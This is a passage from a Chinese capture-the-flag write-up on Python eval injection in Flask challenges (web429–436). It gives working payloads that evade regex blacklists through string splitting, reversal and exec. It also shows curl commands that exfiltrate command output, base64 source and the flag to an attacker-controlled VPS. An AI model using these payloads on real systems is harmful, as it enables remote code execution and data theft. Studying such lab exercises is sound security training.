<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	reg = re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|open|system|read&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.<span class="keyword">match</span>(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>可以看到，这题过滤了open字符串，因为<code>re.match()</code> 是<strong>从字符串开头匹配</strong>，所以我们在前面加个空格即可绕过</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code= open(&#x27;/flag&#x27;).read()</span><br></pre></td></tr></table></figure>

<h3 id="web430"><a href="#web430" class="headerlink" title="web430"></a>web430</h3><p>可以用上题的payload，先看源代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code= open(&#x27;app.py&#x27;).read()</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	reg = re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|open|system|read|eval&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.<span class="keyword">match</span>(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>这题把eval也过滤了，不过对我们没影响</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code= open(&#x27;/flag&#x27;).read()</span><br></pre></td></tr></table></figure>

<h3 id="web431"><a href="#web431" class="headerlink" title="web431"></a>web431</h3><p>继续用上题的方法做就好，看看源码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code= open(&#x27;app.py&#x27;).read()</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	reg = re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|open|system|read|eval|str&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.<span class="keyword">match</span>(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>这次多过滤了str，不影响做题</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code= open(&#x27;/flag&#x27;).read()</span><br></pre></td></tr></table></figure>

<h3 id="web432"><a href="#web432" class="headerlink" title="web432"></a>web432</h3><p>这题用不了之前的方法了，看了网上其他师傅的做法，可以用类似SSTI模板注入的方法来做，构造一条命令执行的链子</p>
<p>由于<code>os.system()</code>不会把命令的输出结果返回给 Python 程序，所以我们用<strong>curl外带数据</strong>显示</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(__builtins__.__dict__[&#x27;__impo&#x27;%2b&#x27;rt__&#x27;](&#x27;o&#x27;%2b&#x27;s&#x27;).__getattribute__(&#x27;syste&#x27;%2b&#x27;m&#x27;)(&#x27;curl http://你的vps地址:端口?p=`ls`&#x27;))</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250822163852721.png"></p>
<p>简单解释里面的一些代码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">__builtins__.__dict__[&#x27;__impo&#x27;%2b&#x27;rt__&#x27;](&#x27;o&#x27;%2b&#x27;s&#x27;).__getattribute__(&#x27;syste&#x27;%2b&#x27;m&#x27;)</span><br></pre></td></tr></table></figure>

<ul>
<li><p><code>__builtins__</code>：是 Python 的一个内置模块，包含了所有内建函数和对象（如 <code>print</code>, <code>str</code>, <code>dict</code> 等）。它在任何 Python 代码中都可以直接访问</p>
</li>
<li><p><code>__dict__</code>：这是 Python 对象的一个特殊属性，它是一个<strong>字典（dict）</strong>，存储了该对象（这里是 <code>__builtins__</code> 模块）的所有属性。键是属性名，值是属性本身</p>
</li>
<li><p><code>__builtins__.__dict__[&#39;__import__&#39;]</code>：这部分代码通过字典键值查询的方式，从 <code>__builtins__</code> 模块中获取了内建函数 <code>__import__</code>。这和直接写 <code>__import__</code> 是一样的，但更隐蔽</p>
</li>
<li><p><code>__getattribute__</code>：是 Python 对象的一个方法，用于获取对象的属性。<code>os.__getattribute__(&#39;system&#39;)</code> 的效果和 <code>os.system</code> 完全一样</p>
</li>
</ul>
<p><strong>%2b表示+号</strong>，目的是为了绕过正则匹配限制</p>
<p>我们可以通过curl把<code>app.py</code>内容转为base64编码外带到vps显示</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(__builtins__.__dict__[&#x27;__impo&#x27;%2b&#x27;rt__&#x27;](&#x27;o&#x27;%2b&#x27;s&#x27;).__getattribute__(&#x27;syste&#x27;%2b&#x27;m&#x27;)(&#x27;curl http://你的vps地址:端口?p=`base64 -w 0 app.py`&#x27;))</span><br></pre></td></tr></table></figure>

<p>默认情况下，<code>base64</code> 命令输出的编码字符串会在<strong>每 76 个字符后自动换行</strong>，所以我们不用<code>cat app.py|base64</code>，会显示不完整，我们用<code>base64 -w 0 app.py</code>即可，参数 <code>-w 0</code>表示取消换行</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250822164006703.png"></p>
<p>解码base64，成功得到网站源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	reg = re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|open|system|read|eval&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.search(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>可以看到之前的<code>reg.match(code)</code>改成了<code>reg.search(code)</code>，意味着从检测开头变换到<strong>检测整个字符串</strong></p>
<p>最后找flag就可以</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(__builtins__.__dict__[&#x27;__impo&#x27;%2b&#x27;rt__&#x27;](&#x27;o&#x27;%2b&#x27;s&#x27;).__getattribute__(&#x27;syste&#x27;%2b&#x27;m&#x27;)(&#x27;curl http://你的vps地址:端口?p=`cat /flag`&#x27;))</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250822164334048.png"></p>
<p>得到的flag没有括号，自行加个括号就可以</p>
<h3 id="web433"><a href="#web433" class="headerlink" title="web433"></a>web433</h3><p>直接用上题的payload会不行，经过测试发现去掉<code>builtins</code>就可以了</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(__import__(&#x27;o&#x27;%2b&#x27;s&#x27;).__getattribute__(&#x27;syste&#x27;%2b&#x27;m&#x27;)(&#x27;curl http://你的vps地址:端口?p=`ls`&#x27;))</span><br></pre></td></tr></table></figure>

<p>也可以把so反转成os，<code>[::-1]</code> 是 Python 中<strong>字符串切片</strong>的写法，表示反转字符串。<code>&#39;so&#39;[::-1]</code>结果是 os</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(__import__(&#x27;so&#x27;[::-1]).__getattribute__(&#x27;syste&#x27;%2b&#x27;m&#x27;)(&#x27;curl http://你的vps地址:端口?p=`ls`&#x27;))</span><br></pre></td></tr></table></figure>

<p>老样子，我们看看源码，方法跟上题一样，base64带出来</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	reg = re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|open|system|read|eval|builtins&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.search(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>可以看到这题把<code>builtins</code>模块禁了，我们直接<code>import</code>就可以</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(__import__(&#x27;o&#x27;%2b&#x27;s&#x27;).__getattribute__(&#x27;syste&#x27;%2b&#x27;m&#x27;)(&#x27;curl http://你的vps地址:端口?p=`cat /flag`&#x27;))</span><br></pre></td></tr></table></figure>

<h3 id="web434"><a href="#web434" class="headerlink" title="web434"></a>web434</h3><p>经过测试，发现这题是把curl过滤了，加个<code>&#39;%2b&#39;</code>在中间就可以</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(__import__(&#x27;o&#x27;%2b&#x27;s&#x27;).__getattribute__(&#x27;syste&#x27;%2b&#x27;m&#x27;)(&#x27;cu&#x27;%2b&#x27;rl http://你的vps地址:端口?p=`ls`&#x27;))</span><br></pre></td></tr></table></figure>

<p>我们看看源码</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Q2B</span>(<span class="params">uchar</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;单个字符 全角转半角&quot;&quot;&quot;</span></span><br><span class="line">    inside_code = <span class="built_in">ord</span>(uchar)</span><br><span class="line">    <span class="keyword">if</span> inside_code == <span class="number">0x3000</span>:</span><br><span class="line">        inside_code = <span class="number">0x0020</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        inside_code -= <span class="number">0xfee0</span></span><br><span class="line">    <span class="keyword">if</span> inside_code &lt; <span class="number">0x0020</span> <span class="keyword">or</span> inside_code &gt; <span class="number">0x7e</span>: <span class="comment">#转完之后不是半角字符返回原来的字符</span></span><br><span class="line">        <span class="keyword">return</span> uchar</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">chr</span>(inside_code)</span><br><span class="line">    </span><br><span class="line"><span class="keyword">def</span> <span class="title function_">stringQ2B</span>(<span class="params">ustring</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;把字符串全角转半角&quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;&quot;</span>.join([Q2B(uchar) <span class="keyword">for</span> uchar <span class="keyword">in</span> ustring])</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	code = stringQ2B(code)</span><br><span class="line">    	reg = re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|open|system|read|eval|builtins|curl&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.search(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>发现多了两个函数，用于将字符串中的<strong>全角字符转换为半角字符</strong>，然后后面调用 <code>stringQ2B</code> 将 <code>code</code> 中的全角字符全部转为半角，返回结果重新赋值给 <code>code</code>，对我们影响不大</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(__import__(&#x27;o&#x27;%2b&#x27;s&#x27;).__getattribute__(&#x27;syste&#x27;%2b&#x27;m&#x27;)(&#x27;cu&#x27;%2b&#x27;rl http://你的vps地址:端口?p=`cat /flag`&#x27;))</span><br></pre></td></tr></table></figure>

<h3 id="web435"><a href="#web435" class="headerlink" title="web435"></a>web435</h3><p>测试发现是<strong>把下划线禁了</strong>，我们可以用web433提到的<strong>字符串切片</strong>方法来反转字符串</p>
<p>首先构建反转代码，我们可以直接引入os，然后调用里面的system函数，原始代码：<code>import os; os.system(&quot;curl http://你的vps地址:端口?p=ls&quot;)</code></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(&#x27;)&quot;`sl`=p?反转端口:你的反转vps地址//:ptth lruc&quot;(metsys.so ;so tropmi&#x27;[::-1])</span><br></pre></td></tr></table></figure>

<p>可以在网页看到原始代码</p>
<p><img src="https://oss.waynejoons.icu/picphoto/20250822185008504.png"></p>
<p>我们具体解释一下<code>[::-1]</code>代码，Python 的切片语法是：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">sequence[start:stop:step]</span><br></pre></td></tr></table></figure>

<ul>
<li><code>start</code> 是切片起始索引（包含该位置）</li>
<li><code>stop</code> 是结束索引（不包含该位置）</li>
<li><code>step</code> 是步长（跨越的索引间隔）</li>
</ul>
<p>其中三个参数都可以省略</p>
<p><code>[::-1]</code> 的含义：</p>
<ul>
<li><code>start</code> 和 <code>stop</code> 都省略，表示从序列的头到尾</li>
<li><code>step</code> 是 <code>-1</code> ，表示步长为-1，即<strong>反向遍历序列</strong></li>
</ul>
<p>这样会创建序列的<strong>反转副本</strong>，不改变原序列</p>
<p>然后我们用<code>exec</code>执行这串代码就可以</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(exec(&#x27;)&quot;`sl`=p?反转端口:你的反转vps地址//:ptth lruc&quot;(metsys.so ;so tropmi&#x27;[::-1]))</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250822185844411.png"></p>
<p>可以把它的源码爆出来看看</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(exec(&#x27;)&quot;`yp.ppa 0 w- 46esab`=p?反转端口:你的反转vps地址//:ptth lruc&quot;(metsys.so ;so tropmi&#x27;[::-1]))</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Q2B</span>(<span class="params">uchar</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;单个字符 全角转半角&quot;&quot;&quot;</span></span><br><span class="line">    inside_code = <span class="built_in">ord</span>(uchar)</span><br><span class="line">    <span class="keyword">if</span> inside_code == <span class="number">0x3000</span>:</span><br><span class="line">        inside_code = <span class="number">0x0020</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        inside_code -= <span class="number">0xfee0</span></span><br><span class="line">    <span class="keyword">if</span> inside_code &lt; <span class="number">0x0020</span> <span class="keyword">or</span> inside_code &gt; <span class="number">0x7e</span>: <span class="comment">#转完之后不是半角字符返回原来的字符</span></span><br><span class="line">        <span class="keyword">return</span> uchar</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">chr</span>(inside_code)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">stringQ2B</span>(<span class="params">ustring</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;把字符串全角转半角&quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;&quot;</span>.join([Q2B(uchar) <span class="keyword">for</span> uchar <span class="keyword">in</span> ustring])</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	code = stringQ2B(code)</span><br><span class="line">    	reg = re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|open|system|read|eval|builtins|curl|_&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.search(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

<p>最后我们找flag就可以</p>
<p>payload：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?code=str(exec(&#x27;)&quot;`galf/ tac`=p?反转端口:你的反转vps地址//:ptth lruc&quot;(metsys.so ;so tropmi&#x27;[::-1]))</span><br></pre></td></tr></table></figure>

<p><img src="https://oss.waynejoons.icu/picphoto/20250822190335029.png"></p>
<h3 id="web436"><a href="#web436" class="headerlink" title="web436"></a>web436</h3><p>可以继续用上题的方法</p>
<p>我们把源码爆出来看看</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> Flask</span><br><span class="line"><span class="keyword">from</span> flask <span class="keyword">import</span> request</span><br><span class="line"><span class="keyword">import</span> re</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">app = Flask(__name__)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">Q2B</span>(<span class="params">uchar</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;单个字符 全角转半角&quot;&quot;&quot;</span></span><br><span class="line">    inside_code = <span class="built_in">ord</span>(uchar)</span><br><span class="line">    <span class="keyword">if</span> inside_code == <span class="number">0x3000</span>:</span><br><span class="line">        inside_code = <span class="number">0x0020</span></span><br><span class="line">    <span class="keyword">else</span>:</span><br><span class="line">        inside_code -= <span class="number">0xfee0</span></span><br><span class="line">    <span class="keyword">if</span> inside_code &lt; <span class="number">0x0020</span> <span class="keyword">or</span> inside_code &gt; <span class="number">0x7e</span>: <span class="comment">#转完之后不是半角字符返回原来的字符</span></span><br><span class="line">        <span class="keyword">return</span> uchar</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">chr</span>(inside_code)</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">stringQ2B</span>(<span class="params">ustring</span>):</span><br><span class="line">    <span class="string">&quot;&quot;&quot;把字符串全角转半角&quot;&quot;&quot;</span></span><br><span class="line">    <span class="keyword">return</span> <span class="string">&quot;&quot;</span>.join([Q2B(uchar) <span class="keyword">for</span> uchar <span class="keyword">in</span> ustring])</span><br><span class="line"></span><br><span class="line"><span class="meta">@app.route(<span class="params"><span class="string">&#x27;/&#x27;</span></span>)</span></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">app_index</span>():</span><br><span class="line">    code = request.args.get(<span class="string">&#x27;code&#x27;</span>)</span><br><span class="line">    <span class="keyword">if</span> code:</span><br><span class="line">    	code = stringQ2B(code)</span><br><span class="line">    	reg = re.<span class="built_in">compile</span>(<span class="string">r&#x27;os|open|system|read|eval|builtins|curl|_|getattr&#x27;</span>)</span><br><span class="line">    	<span class="keyword">if</span> reg.search(code)==<span class="literal">None</span>:</span><br><span class="line">    		<span class="keyword">return</span> <span class="built_in">eval</span>(code)</span><br><span class="line">    <span class="keyword">return</span> <span class="string">&#x27;where is flag?&lt;!-- /?code --&gt;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">if</span> __name__==<span class="string">&quot;__main__&quot;</span>:</span><br><span class="line">    app.run(host=<span class="string">&#x27;0.0.0.0&#x27;</span>,port=<span class="number">80</span>)</span><br></pre></td></tr></table></figure>

